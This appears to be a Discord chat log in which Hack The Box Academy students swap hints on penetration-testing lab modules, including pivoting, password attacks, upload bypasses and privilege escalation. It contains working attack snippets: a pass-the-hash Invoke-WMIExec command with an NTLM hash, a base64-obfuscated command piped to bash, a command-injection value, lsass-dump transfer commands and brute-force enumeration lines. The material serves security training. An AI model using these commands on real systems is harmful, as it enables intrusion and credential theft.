#modules
I'm just thinking it might be this way, hoping anyone can correct me if I'm wrong
Return traffic is, it just sends the traffic back to where it came from, in this case (1) 172.16.5.19:8443 -> (2) 172.16.5.129:ARBPORT -> (3) (Internal Bind mapping for 172.16.5.129:ARBPORT and 172.16.5.129:8080) -> (4) 10.10.15.5:ARBPORT
You could get a traceroute and that’ll tell you.
The 3rd step is where the magic happens, and the ubuntu machine knowing to forward it to our machine, once it receives the packets from the windows host.
Usually hosts don’t forward packets and it’ll get forwarded to a router or switch. In this instance, it’s being forwarded to a separate subnet. So there’s definitely a router hop here. Forwarding is done using longest prefix match
I believe trace-route would just stop at the first packet in this case?
In the medium Lab?
Check out all the services.
I still don't know which list you mean, but I suspect you are trying a brute force approach. If yes, this is the wrong way
Has anyone here managed to get past the Exploiting Web Vulnerabilities in Thick-Client Applications yet? I'm running into an issue. I get to the point where I've created the fatty-client-new.jar and when I double click on it to open it, nothing happens. I went back and made sure I removed the hashes from the MANIFEST.MF file and altered the port number to 1337 in the beans.xml file as specified. Any idea why the fatty-client-new.jar isn't working?
I feel like I get your point, yeah
No? Why do you think that? And why are you using “stop at the first packet”? The way traceroute works, it sends a packet and forces an ICMP message back to the sender
You done that section?
traceroute measures the route based on TTL counts right? so I can only traceroute to the ubuntu host, not to the windows host. so my traceroute will only fetch the hops from my machine to the ubuntu machine and not any further right?
We are talking about running traceroute from the attacker machine yes?
how is it wrong
There is no trace route command in the victim machine, and you cannot run trace route in your own machine to connect windows server
Yes, traceroute works by exploiting TTL by eliciting a time exceeded. The message that gets sent back is an ICMP message.
I was speaking generally on how to view the route a packet takes.
You don't need to force anything in this lab
I doubt that we could get any meaningful information from using traceroute in this case we have.
I didn’t mention connecting to the windows server using traceroute? I was just talking about how to view the route a packet takes
was that a tip?
Probably. But you were speculating the path a packet takes and I was thinking “Why speculate when you could get the actual information”
Take a close look at all services
Not all need a password
Hi all, in the module password attacks, PtT from Linux, can someone give me a hint on how to find svc_workstations keytab file. (I have a keytab file without the NTL hash) Or forge the tgt ticket? I'm a bit lost :/
We could get the actual information*, only with network sniffing tools in this case tho, as we're working with TCP which involves source and destination IP:ports, not with traceroute which just works with ICMP and ICMP has nothing to do with speculating port and its traffic
I believe tcpdump on the ubuntu host with filters would be right choice for knowing this.
@rapid sparrow the ubuntu host got tcpdump?
I don't have that permission
Ah right,
sorry rechecked, I could run it
with sudo
yes
pm?
In terms of understanding the network, it has its uses. And what you’re describing is called the 5-tuple which identifies the session. And while looking at ports is useful for identifying processes. But I imagine the layer 4 traffic is more useful for identifying the process 🤣
https://academy.hackthebox.com/module/136/section/1290 Upload Attacks - Type filters
any hint?
i arrived here
What questions you can't answer?
you've successfully passed the white-list filters, now time to crush those black-list filters
can someone tell me what service is it !!
https://academy.hackthebox.com/module/112/section/1079
its so frustrating and i tried them all
htb is weird sometimes , feels like some guy made this lab while being sick
the only one there is
Check out all the services. What or which services were discussed in the module?
No one was sick when they wrote this module. Just because you may not have understood everything doesn't mean the author did anything wrong.
everybody who did the module know it
oh that photo
lets all put a like on that
why's your payload sitting in an image src?
the file uploads is there
this is my burp request
i got it
Ah, nvm for my question.
How'd you get it?
long
||making a list for the whitelist, blacklist, magic byte and the content-type accepted||
||and just taking the double extension that let me run commands in the backend and the one which the page will think it is an image||
Hi! Can anyone help me with the very last stage of Getting Started? Knowledge Check. https://academy.hackthebox.com/module/77/section/859 I found the exploit in the theme changer and got a shell, but can't find the user.txt. I think I might have blown past it because I found I have root access to PHP and root is a command away.
Got it, LOL.
@fossil crescent Hey, can I DM you regarding this? I've bypassed the WAF but not getting the email.
Sure np
Sent you a friend request for DM.
HTML Injection--> Module 'Introduction to web applications', What text would be displayed on the page if we use the following payload as our input: <a href="http://www.hackthebox.com">Click Me</a>
Answer --> Your name is Click Me
ayyeee same @pine dagger from FN discord. Small community
Woo! HTTP Attacks all done. Was soooo close to the answer, just needed a little hint.
Having issues with the getting started knowledge check
Can't upload my php reverse shell
the upload button is not working on the admin page
Anyone here able to lend some assistance with the LDAP section in Attacking Common Applications?
I've tried everything I can think of and I seem to bypass the login.
Never mind. I figured it out.
I’m stuck in the attacking common services hard lab. I got rdp creds for F, along with the other .txt files, know I can impersonate as J, found a linked server L, but I have no idea how to interact with it😅
u impersonated already?
Yes, I’m impersonated as J
and have u done after that
I found the linked server L
But I’m not sure how to interact with it
I also found a table called tb_users but I can’t seem to open it
Communicate with Other Databases with MSSQL
there is a part called like that
in the sql section
I know
But like I said, I can’t figure it out
@zinc marsh do you mind if I dm you so I can speak more freely?
did u activate the cmd
in the sql?
as u want but u just have to read the sql section
Sent you a dm
academy HackTheBox isnt letting me unlock modules even tho i have enough cubes. Any idea why?
u sure?
Yeah i have 70 cubes and the module is 10. Im just doing the "Free" stuff
I press unlock and nothing happens or pops up
there arent modules for 10 cubes lol
? there's one called Learning Process and it says Unlock for 10 cubes?
ah the fundamentals
Yeah
It says its 10 cubes but gives you 10 cubes back so technically free
if u click on unlock u cannot unlock them?
No, all it does is slightly move everything to the left and when i click it again it moves back to the right
close it and open it again maybe?
Nothing, i even logged out and logged back in and still the same
idk contact support
that is weird u are the first person i see with that issue
https://academy.hackthebox.com/achievement/664482/136 Finally, the skill assessment was crazy
Arbitrary file uploads are among the most critical web vulnerabilities. These flaws enable attackers to upload malicious files, execute arbitrary commands on the back-end server, and even take control over the entire server and all web applications hosted on it and potentially gain access to sensitive data or cause a service disruption.
Hey does anyone know how the modules work post subscription? Like if I buy cubes but let me monthly subscription out I keep the courses I unlocked? But if I pay for a yearly subscription rather than cubes and have unlimited access below tier 2... Once that subscription is up I lose access to everything?
Contact support here or on the site?
u have access to the modules u completed
site
cool cool. Thank you
Alright thanks!
It's more worth it to just pay for platinum or student tbh.
No time limit to finish the modules + you can buy whatever module u want.
I've spent more money on dumber things 🫠
hi so i was doing this module https://academy.hackthebox.com/module/54/section/483
and im kinda stuck now
we are supposed to recurse the directories of the target machine and look for the flag but there are only 2 directories of the target machine and they both have files which dont have the required flag
help ._.
Capitalism.exe
hey everyone, I'm currently on the ACL Enumeration part of the ACTIVE DIRECTORY ENUMERATION & ATTACKS Modules. I'm stuck at the last question What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word). I managed to find the answer via bloodhound but I can't get the correct answer format to submit 😭
oh my days! It turns out that AceType has a different name which isn't even mentioned in the Access Control List (ACL) Abuse Primer 😭 . Hope they fix this or at least update the question
Anyone done with the Intro to Windows Command Line?
I am stuck on user4 for hours
I have tried everything but I can't get the flag.
You should take a look at the logrotate configuration files. I'm still trying to get this exploit to work though.
How should I brute force with Fiona user at attacking services easy lab?
If you're referring to|| the compress option set||, I did adjust the command accordingly. Others were having issues as well, not sure if anyone has solved it yet.. I think it's bugged lol
With a nine headed water serpent
It's a hint to the tool you should use
Lol yes hydra
I'm using hydra with rockyou
And put full name
I tried with provided password list too
Neither works
Dm me your command if you want
I just solved it... it's painful. ||pspy can be helpful||
Done
pspy just confirms that it's being rotated by the root user, that's all I saw when I used it. Did it show something else that was helpful besides that?
It shows|| the time period and that it's not a configuration file you can view... so look for what might be rotated...||
Hi
I did find which log is being rotated ||the one in the home directory and time is 5 seconds|| and I had logrotten win the race conditions but my payload didn't execute. i.e I didn't see my payload sit in the ||bash_completion.d|| directory
So far that sounds good. ||It won't execute immediately. Consider what might cause it to execute.||
Yeah, by winning the race condition I meant, ||modifying the file to get it to log the file which in turn executes the exploit||
If that's what you are referring to?
the exploit ||adds a file to a /etc/... configuration directory -- just adding the file doesn't cause it to execute immediately||
can anyone help
Uh huh, I was expecting it to execute automatically from the way I've seen it being exploited. I'll look into it.
Thanks for the insight
hint fuzz one of those 2 directory
hint try some of the stuff under Find & Filter Content in the cheat sheet of that module
Yeah I managed to find the solution a while ago. Used Where-Object to find it
Ok
done PM me for hints
Anyone pls help?
Have you tried bruteforcing with a mutated password list?
Yes I did
tried crackmapexec, when i did that assessment i wasnt able to get the password with hydra, but i was able to get it using crackmapexec
also in my case, crackmapexec seems to run faster from the pwnbox than from my kali vm
hiii , i'm a newbie , just joined today ! happy to meet you all 🙂
have you got it?
I find the conf file and access.log file, and try to get the reverse shell back, and IDK how long it takes
Hi, in pass attack - credentials hunting in Linux, I'm mutating the Loveyou1 password with a custom rule and brute forcing with hydra over ssh, but I don’t have any credentials for Kira!
Try a different service that's running. Also are you using the custom.rule from the resources?
Ya from res .. I’ll try another
Hi, I am practicing the RDP session hijacking explained here and can't make it work https://academy.hackthebox.com/module/116/section/1171 .
Weirdly, every time I use tscon to do session hijack, I am asked to provide password. (I am, of course running this from SYSTEM privs)
I have also tried the "graphical way" using directly taskmgr as SYSTEM and it doesn't works...
Any idea of what could be wrongly done ?
Finally done with the updated one
what does oen mean ?
one*
do you mean that each time a module gets modified, you can "pass" it again ?
correct, re-pass it
ok, didn't know that. so, does that also mean that we must check for any module update before being able to finish the job role path ?
2 services working on the target ssh ftp using hydra after mutation pass tell me ||!!!!!!!|| but when log in I can’t because this is not correct password
yes you are right, and if you schedule the exam using your annual leave, and when the module updated, you might need to re-schedule
Remove the password from your message. Also are you copy/pasting the password in the password prompt?
the password is correct
but perhaps you may need to auth other ways than ssh
Sometimes if you message support they'll give you a pass for it and allow you to take the exam* depending when the content was updated
Removed .. ya just copy paste
Are you getting a (public key) error?
Anyone has played with RDP session HJ ?
No now It’s work just restart my machine thanks 🌹
Hello All
Could you please help me with Easy lab from Attacking Common Services?
I got the username fiona
and also files from ftp
Now I don't know what to do with 50652.txt
idk what should I add in "PoC."
What is 50652.txt file? Where did you get it?
I got the Web info txt file from ftp and there was info about CoreFTP
There's a couple different ways to exploit
I'm not sure what to do now
I know that this website used Apache and I know the directory
I know that there is CoreFTP
i fuzzed them MULTIPLE times. blog has just a home.php page while forum has no valid page in it.
Have a look at the other txt file
ok FTP using HTTPS
ftp got only 2 files as I know
Yes, you know the exact paths with it. They are important.
pls help
With what exactly?
You now have the exact paths. What could happen if you could save a file in one of the paths?
Development Frameworks & APIs --> Module 'Introduction to web applications' --->Use GET request '/index.php?id=0' to search for the name of the user with id number 1? answer == Target + index.php?id=1 in the browser.
try it
What exactly is the question?
How do I Terminate this so it stops using up my time?
Academy targets don't use any time up.
but which shell?
The only thing that's limited (unless you buy cubes) is the in-browser vm (pwnbox)
from 59 to 56 minutes
That life left is the timer until the target itself dies
thank you @fathom pendant
You can respawn the target an infinite amount of times
If you're using a personal vm with VPN there is no time limit
Think about how you could save files.
using PUT
stuck with this
Comment out the socks5 7777 line
Literally read the error, it tells you what went wrong
it works now, thanks
Folks .. I’m in Kira now when search about information I found ||login.json|| I need to decrypt user and pass but I cant using Firefox_decrypt tool or LaZagne
Hi I have an issue in "RDP and SOCKS Tunneling with SocksOverRDP" module.
Real-time protection sucks ;)
The .dll file extension will delete I do not know why I can't run regsvr32.exe SocksOverRDP-Plugin.dll.
Sorry, what is this?
Hi. Is anyone done with Linux PrivEsc Environment Enumeration section? I've been looking for the flag for two days still can't find it
Just because defender is turned off, doesn't mean there isn't any protection running
I am stuck on the same
I tried proceed to the next section to find the latest Python version. Found out the latest python version is 3.11, but doesn't work as well.
Thanks.
Hi
hey guys, are there plans to have VPNs available for asia region?
2 Tools doesn’t work on my kali or on pwnbox any hint or idea ?
someone mind helping me with Pivoting, tunneling and port forwarding skills assessment? I'm stuck at this question:
For your next hop enumerate the networks and then utilize a common remote access solution to pivot. Submit the C:\Flag.txt located on the workstation.
I know what to do, but need a hint about how.
dm you
It's as it says, how do you enumerate a network?
It's just the file transfer that is not working
need the lsass.dmp file on my own machine
but can't get it
what is the current working directory that you are in?
what kind of file transfer techniques did you use? since, there are a lot of pivots. You'd have to transfer files step by step from each pivot and finally to the host
Which is a hassle, or you'd have to setup a way for your hostmachine to directly reach the windows machine and it's just a copy paste from here
C:/Temp? that's where you land when you execute the web shell?
do a pwd and can you tell me what it says?
From the first host to the one with the dump I tried:
scp
smb
The same from my host to the machine with the dump
In common webshells, your commands would always be executed in the same directory. You can read this #modules message if you want to understand why
To import modules and use them, you need to have a reverse shell, I believe you just can't do it from WebShells because every command you execute through webshells is packed in a new session.
So pick up a simple payload from your favourite reverse shell site and get the reverse shell first
not sure what pivots are in place, but if your first host (assuming not the attacker machine and the actual first machine used to pivot is being referred to the first host here) can reach the machine with the dump, then you can create tunnels or port forwards to reach the dumps machine
Yeah, that's what I did. I'm currently with proxychains xfreerdp /v:... on the machine with the dump
Awesome, then you got two things you can do to dump it
copy paste or use xfreerdp /drive option to attach a drive and get the dumps
proxychains xfreerdp /v:172.16.5.35 /u:mlefay /d:inlanefreight.htb /drive:\PIVOT-SRV01\Users\mlefay\AppData\Local\Temp
or
proxychains xfreerdp /v:172.16.5.35 /u:mlefay /drive:SHARE,\PIVOT-SRV01\Users\mlefay\AppData\Local\Temp
or
proxychains xfreerdp /v:172.16.5.35 /u:mlefay /drive:SHARE,C:/Users/mlefay/AppData/Local/Temp
is not the right way I assume? It is giving me errors all the time
you're launching xfreerdp from your attacker machine right?
yea
You can only mount files from your attacker machine
not files from the remote machine
https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/
This is what I found tho
Really? Hmmm, weird.
The terms might have confused you but, it's always the folder from your local machine where you'll be executing xfreerdp that you'll be mounting
/drive:SHARE,/tmp/
means inside the rdp you can access,
the files inside /tmp with \\TSCLIENT\SHARE\
Ah
keep hitting R and Enter
To import remote modules, you'd have to the script execution policy
normally, if you were doing this from a GUI, you'd have a prompt that says "Do you want to run? [Press R]" something like that
but in reverse shell cases, you won't see that prompt, except that prompt is listening for you (which in this case, you think it's frozen)
yeah, that works but I'm really confused on how to get them now tbh
You could do Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process but it'll still ask you I guess.
you can from two ways
GUI -> goto the mounted drive, you should see it in the This PC menu
Command line -> use the copy command
That's what I did. But I'm feeling so dumb tbh
I'm prob doing the most stupid things
you got the dump inside the mount, that's all lol
you should now be able to see it in your machine where the mount root is
how many times did you press r and enter?
just once?
hhahahahaha funny
Okay, I was facing this problem once, I don't remember, maybe try A and enter
also you're doing it like
r
r
r
and not rrrr right?
yes he is doing r r r r not holding r
read #welcome
?
if that's not it either, then it's something else.
❤️ ❤️
@amber marten I'm thinking for .ps1 it might be different. but for Importing .psd1 modules you'd have to hit R multiple times
Like this is a note I made when I faced this
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
can someone give hint on this "footprinting" module
dns enumeration
I've been trying so long and cannot find anything please help me
same
dnsenum --dnsserver 10.129.138.136 --enum -p 0 -s 0 -o found_subdomains.txt -f /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt inlanefreight.htb
Doing Using CrackMapExec : Skill Assessment and currently stuck on the foothold, I managed to brute rid and i don't know how to proceed
any help is well appreciated
ah, figured it out, had to think a bit more about what was happening 😁
You need to find all Zones
Why do you want to bruteforce the main zone?
im getting no response if i try bruteforcing the subdomains
dnsenum --dnsserver 10.129.138.136 --enum -p 0 -s 0 -o found_subdomains.txt -f /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt mail1.inlanefreight.htb
same with app.inlanefrieght.htb
Hello everyone! I need help with the module "ATTACKING WEB APPLICATIONS WITH FFUF", section "Parameter Fuzzing - GET". I cannot seem to find the right parameter. I believe I found all directories and .php files. I tried fuzzing every one that I found but with no luck. Can anyone help me?
I solved logrotate - look at a few suggestions I added earlier
you finish the Linux priv esc module?
Hello, there are seniors on Windows PE.
Windows Privilege Escalation Skills Assessment - Part I
Q-2
What is the secret of finding the ldapadmin password with the privileges with which we log in?
Without an administrator, the password is NOT searched.
How should we have searched for it correctly starting with the second question, and not when we had already increased the privilege and did not launch - ||LaZagne.exe||
yes
As I said, you have to find all the zones.
Which of these subdomains could be managed as a separate zone?
File upload attacks got a crazy twist on the skills assessment lol
Use GET request '/index.php?id=0' to search for the name of the user with id number 1?
Why ID=0 when you are looking for the user ID=1?
It was a fun assessment lol
In the same question it indicates that you must use the id number 1 to obtain the user name.
and that does not work?
I deduced it from the question and as such it is obtained with the target + the GET request to obtain the user's name.
target/index.php?id=1
You get the answer
I try to do the questions without help to get a better understanding but there are others that I find difficult and I ask for help from all colleagues.
Hi ! I'm a little bit stuck in the password attack module : "What is the default password of every newly created Inlanefreight Domain user account?" can i have another hint pls i didn't find the script
don't
did you read the pdf? i think it's that question
☝️
which pdf ?
DM you
Linux Privilege Escalation
Logrotate
Did anyone get this to work?
On ATTACKING COMMON SERVICES > Attacking DNS (https://academy.hackthebox.com/module/116/section/1512) : when using subbrute I am always getting a warning message : Warning: No nameservers found, trying fallback list.
Does some of you know why I am getting this ?
I have tried on a test zone locally and don't get this warning. I am also able to communicate with the dns server referenced within resolvers.txt file using dig / host.
What is in the resolvers.txt?
it contains my target's ip
after enabling verbose mode and running Wireshark, I realize that this seems to be because the target DNS server doesn't accept ANY as query type... I may need to find another tool that will use all types of query perhaps
Are you sure that com and not htb or local is asked?
Rip. Well at least you got it sorted ❤️
Im stuck on password attacks ,network attacks
WINRM 10.129.202.136 5985 WINSRV [-] WINSRV\user.list: "SpnegoError (16): Operation not supported or available, Context: Retrieving NTLM store without NTLM_USER_FILE set to a filepath"
I keep getting this when I run my Winrm command
and I downloaded the lists from the resources button up top
what is the command you typed ?
are you sure the file user.list exists ?
it's username.list. damn thank you lol
whats the command to open a flag.txt file?
Windows or Linux?
linux
Should be able to use cat
As in it gives you an error or it's empty. If it's the file not found error, are you sure you're in the right directory?
Evil-WinRM PS C:\Users\john\Documents> cat flag.txt
Evil-WinRM PS C:\Users\john\Documents>
what am i missing
type flag.txt
no im on parrot terminal
Evil-WinRM PS C:\Users\john\Documents> type flag.txt
Evil-WinRM PS C:\Users\john\Documents>
Brother
same thing
https://github.com/Hackplayers/evil-winrm try downloading the file
Also what module are you doing?
yeah but im this far lol. might take a break and try that
Like I said though evil-winrm has a download feature you can use to download the file
¯_(ツ)_/¯


Can I PM someone about password attacks-hard? Will give away too much spoilers if I do it here
It's a lot of back and forth
Yeah, but I got stuck somewhere I didn't think I would get stuck... So just want to know if I'm just stupid or that there is really a problem
Privilege escalation is a vital phase of the penetration testing process, one we may revisit multiple times during an engagement. During our assessments, we will encounter a large variety of operating systems and applications. Most often, if we can exploit a vulnerability and gain a foothold on a host, it will be running some version of Windows ...
go for it
# bash<<<$(base64 -d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDEK)
am i writing something wrong here?
66 modules done. 10 modules to go. 🙂
Is this a good order to learn things? Its all fundamentals or intro. (Top being 1 and going down from there)
Getting started should probably be first
I was thinking that as well but it says i should have a firm understanding of these other things to be able to complete it
But I'd say doing the infosec fundamentals path should be first
I mean i got all of these minus 2 from the infosec foundation path. I just dont have enough cubes to go through that whole thing
¯_(ツ)_/¯
Has anyone run into issues using the gitlab_userenum.py tool? I had no problem using it earlier on the module, but I'm trying to use it now in the assessment and no matter how I try to run it, I either get an access denied error or it says the --wordlist that I'm pointing to doesn't exist.
Yeah, I got through this lab. What's your question?
@red current the sa credentials
depends on ur previous knowledge
how can i use it to login to the database?
u have also https://www.google.com/
Absolutely none haha, ive read things before about some of the things in the list but not to an extent of fully understanding
i just found that lol
Is anyone available to provide assistance with the Attacking Common Applications Skills Assessment II? I answered the first question and can't seem to get any further with anything I attempt to use.
Guys if I wanna start learning programming, do I need a laptop with high specifications or anything would work ?
- are Harvard courses can be considered as a good option to learn or gotta find another thing ?
You dont need high spec laptops to start learning programming
Its not like you're going to be coding programs with 100,000 lines of code to start with
I see thanks you!
What about this point?
There are so many free programming educational resources that the best option is whichever one works for you
If the Harvard one is free and you vibe with it, go for it
That's clear thank you but from your experience do you recommend something?
https://academy.hackthebox.com/module/109/section/1042 command injection - skills assessment
someone could give me a hint, I got run 'ls' command
I'm not the best to recommend a structured resource because that's not really how I learn, my learning is "I need to do X, how can I do X" and I google from there
Harvard sounds as good as any others, I mean, it's fricken Harvard
I did one from them
they are really good*
Hard or so so ?
Depend on the person i guess
Makes sense
Do they give a certificate?
there are some free courses there
Yup I read about that
the one i did is not there because it was for the last year
yea
Pretty nice
I think I have to join it
Thanks so much for your help
np
Hey guys, I'm working on Skill Assessment - Broken Authentication. I have ||a list of valid users||. I don't know how to ||brute force the login page and avoid rate limiting using the rockyou.txt file||. I'm also not sure if ||I used the right regex to limit the rockyou.txt wordlist||. Can anyone help?
Short module but funny 🙂
https://academy.hackthebox.com/achievement/664482/109
I can't anymore... Password attacks - hard. I found 3 passwords and none of them is working to unlock the vhd file
Its a simple password
hi.
im having trouble with the password attacks module
especially with the Pass the Ticket (PtT) from Linux questions
Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.
i have found the flag but am unable to submit it
is there a bug here or something wrong?
i have tried converting it to base 64
downloading the file
everything
it might be a bug in the htb
Can anyone assist me with the following module? I cant get this answer
Module: INFORMATION GATHERING - WEB EDITION
Page 7 Active Subdomain Enumeration
What is the FQDN of the IP address 10.10.34.136?
nslookup -query=PTR <IP> ns.inlanefreight.htb
dig -x 10.10.34.136 @ns.inlanefreight.htb
which question you at @gusty zinc
What is the FQDN of the IP address 10.10.34.136?
try zone swap
did that, no domain in the output matches the .136
if i remember theres a internal.
try zone transfer with that
add me on discord
ill try and help (i did the module)
Check for extra white-spaces, if that doesn't work DM me the flag and I can check it.
done
dont forget subdomains of subdomains
Hi, i am working on the module "ATTACKING COMMON SERVICES " part "Attacking FTP"
The target box keeps the port i need to attack close, i had just one box with the right port open all other boxes keeps the port close. Who can help me ?
reset the target until the port is opened
it could take a reset or two, but also make sure to give it 3-4 minutes to load
I did already 4 resets, and the box which is running now is already up for 32 minutes
It's a bit annoying, i just want to complete the path for the Academy
🤷♂️
No one here with knowledge of those boxes who can look into it ?
well, reset it until the port comes up
Hmm, too bad
we here are in most cases students like you.
Technical questions are best asked to the support (green bubble).
Just keep resetting, I had the same issue. Was pretty frustrating indeed
Yes it certainly is, especially since it is quite a simple module, and then it takes so much time
After 19 resets i finally found one box with the port open
Debug the attached binary to find the flag being pushed to the stack
Anyone done this?
ayo
i need some help with this : Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.
can't find any
I would advise to read the man page for cURL
I got it, thanks!
But you need to find right user with his country code
And how to do it ? Check the task about enumeration users
Don’t forget to filter with website’s requirements from file rockyou.txt
Hey guys! I am currently in a CS class and I have to scrape a website and was wondering if anyone here know of any good, free Web Crawlers that I could use? The website that I'm gonna scrape might be relatively large, so something that could handle that would be nice. Any help on this would be greatly appreciated!
Good morning chat, i have an issue with the IMAP/POP3 section of foot printing. to be precise it is this question " What is the admin email address?"
i was able to get the email address after accessing the imap server and retrieving the flag. But my question is was there a way to get the "admin email address" without accessing the imap server
there was no hint to tell us it was on the imap server. I just guessed that was the mail and it worked
Hi, I'm trying to contact support regarding some problem with billing, but I can't get a "live person" via support chat. There is no option "Send us a message". Adblocker is disabled for this site ofc...
As the module related to IMAP and you found the answer there, you found the intended route
hey guys , im in the database but idk where to look ... any hints ? https://academy.hackthebox.com/module/112/section/1079
??
katana from Project Discovery, or hakrawler
dm you
good afternoon friends, can i upload pics here?
So there was no other way for us to see the Admin email unless to open a mail ?
Again i just want to be sure if there wasn't something i was missing that would have shown the email add
The module was focused on that specific method. Email addresses can be discovered in other instances via other means such as Googling, enumeration of usernames (as email addresses are usually username@organization.org), looking at the domain's WHOIS information, etc. However, for this module, you completed the module in the intended manner.
If you verify your account you should be able to
At least I’m able to
In Passwd, Shadow & Opasswd I need to crack unshadow.hashes using hashcat and rockyou.txt but it takes a lot of time, is this normal?
Do you need to use rockyou or is there a password list provided in the resources?
No my rockyou file in kali
Use file in res maybe make it quick ?
I’ll try
Nothing change
What’s the module?
Password Attack- passwd.shadow&Opasswd
Use the mutated password list
Made from the pws.list provided + the custom.rule
Ya I’ll try also I made this list in previous questions
👍🏼
Thanks bro I’ve gotten answer
You’re welcome
you can ask on behalf of the ticket (user) you already have for another one
Verify it from my gmail you mean?
try to check the kerberos tickets that are integrated into your session and use the full UNC path (FQDN)
thank you for your help 😊
You’re welcome 👍🏼
anyone done this lmao
https://academy.hackthebox.com/module/85/section/900
Try assembling and debugging the above code, and note how "call" and "ret" store and retrieve "rip" on the stack. What is the address at the top of the stack after entering "Exit"? (6-digit hex 0xaddress, without zeroes)
IK everyone almost focus on CPTS and CBBH path, but assembly is also fun 
INTRO TO ASSEMBLY LANGUAGE - Procedures
I have a question about "impacket-smbserver", If anyone is able to help.
just ask and we'll see if we can help. Just want to add that it may be opportune to ask in "#general" if isn't correlated to an academy module
It has to do with (Password Attacks Lab - Hard)
When I set a share with User&Pass using (impacket-smbserver) and then try to transfer files. I get "access is denied".
INTRODUCTION TO NOSQL INJECTION - Skills Assessment 2
Can someone help me with finding the injection point? I've tried FFUF, nosqlmap, and Burp-NoSQLiScanner, but none of them can find the injection.
Look to the dot
omg lol, sadistic people behind this one. I suppose the rest of the module was fairly easy, so they needed to throw in a curveball
dm you
Module: Password Attacks
Section: Pass the Hash (https://academy.hackthebox.com/module/147/section/1638)
Was anyone able to use Invoke-TheHash for the last question?
Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
I can't find out why it isn't working. I copy-pasted the command line shown in the explanation part and I had no output:
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "powershell -e <payload crafted>"
Anyway, I got the flag using chisel, then evil-winrm to the DC01.
read the options for secretsdump
need a hand for the skills assessment for pivoting and tunneling. I pivoted from the linux jump host to the first windows machine using proxychains xfreerdp and creds for mlefay. the question is asking about "which user is vulnerable". I saw the hint mentioning using "lsass". I have created a dump of lsass and am now stuck on how to get that file over to my attack host. do i take the dump file and move it to the linux jump host first? or do i get a meterpreter reverse shell to the windows machine, but how would that help? I'm lost.
well what errors did you get
I mean up to you. However youre most comfortable doing file transfer is your call
maybe im missing something. I'm not on the same network as the windows machine that has the dump file. so doing a typical file transfer method would never work, right?(i tried using smbserver and it did not work). So i was thinking of transferring the file from the internal windows machine to the linux jump host, but none of my tools are on the jumphost. I feel like im missing something easy.
hmm I dont believe that error should matter
sure if you want to you can do that
could also open up a new port forward for the file transfer
or get a meterpreter beacon running
or use a different tunnel method
this isnt a wrong answer situation, its a whatever works situation
is there a "best practice" answer?
no, its environment and opsec dependent
and the cpts doesnt cover opsec
so its whatever works for you
cool, thanks for the help
does svc_sql have the right privs to dump the ntds?
@amber marten btw you should remove the spoiler password from your posts, its a lab assessment
from my searching that error shouldnt matter and can be ignored
try targetting a specific user, to see what kind of output you get
-just-dc-user administrator
👍
hi guys bro
[-] Cannot create "sessionresume_PlbBSNvK" resume session file: [Errno 13] Permission denied: 'sessionresume_PlbBSNvK'
I wonder what this error is, some kind of resume file like potfiles in hashcat?
tips or hints to as a start please ... already found the services: https://academy.hackthebox.com/module/112/section/1080
remember that there are several network protocols
https://academy.hackthebox.com/module/134/section/1178 Web Attacks -- HTTP Verb Tampering -- Bypassing Security Filters
I have tried all the HTTP Verbs, I had thought using command injection with verb tampering but not sure if it is the intended way
is the target machine windows?
i didn't check
a quick look at Wappalyzer should tell you I guess
ubuntu linux
```
http://159.65.60.16:31443 [200 OK] Apache[2.4.41], Bootstrap[3.0.3], Country[UNITED STATES][US], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[159.65.60.16], JQuery[2.1.3], Script, Title[File Manager]
```
The hint says this: "See which HTTP method the injection filter is using, and try to use a different one."
There is one more, but I'm not sure if it'll work with linux as it's more of a iis implementation but,
||TRACK||
the verb is one of the common ones
I have tried ||post, head, options, put, patch, delete, connect, trace||
oh, then you haven't tried all the common ones 
get is the default one
good, but you might be forgetting something crucial
finding the verb is part of the exercise, getting the flag is the other part
I thought i just had to use the file; cp /flag.txt ./
yes, but with the appropriate parameter verb
make sense ty
how can i deobfuscate the js code?
anyone can help with this error?
ssh tom@10.129.218.26
tom@10.129.218.26: Permission denied (publickey).
looks like you need a key
Is anybody able to assist me with the KERBEROS ATTACKS module?
It isn't a module specific question, I am more confused with how it wants me to connect to a machine.
Thanks!
which section
Having trouble with Attacking Common Services, DNS. Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer.
dig is not working, and subbrute is not giving me a flag
Golden Ticket from Linux
Not sure how to connect or what it means for this?
the spawned target is DC01, after you have done the needed steps you can then connect to it via tools available in both the workstation and your local vm assuming you have kali or parrotos
also in the section is shown how the connection is made
I need the SID and I am trying to do it from the PwnBox
what about the hosts file
I had an entry for inlanefreight.local but not dc01.inlanefreight.local 
Thank you! 
Hello, little suggestion. Could you please add a functionality to mark as uncompleted when we mark as completed?
Anyone wanna give feedback on my report from Documentation and Reporting module? Already had someone do QA for the Executive Summary. Need someone with more technical experience to look at and judge the rest.
hi can someone help me with the privilege escalation challenge in Getting Started module?
I'd love to take a look and supply feedbacks that I can think of.
@misty current Cool! can I pm?
Yup
I am trying to forward an ssh key to remote server's folder so I can log into user2 from user1 for privilege escalation but its saying permission denied
this is for the privilege escalation challenge in the Getting Started module of CPTS path
which is 2nd module in path
hint is better than giving me answer please
actually don't just give me answer because I don't learn that way
what file perms do you have on the key?
also why transfer the key over and not just ssh with it directly?
oh well hold on let me try it
but it can't possibly let anyone just generate a random ssh key and let them use it to log on as just any user tho that would be crazy
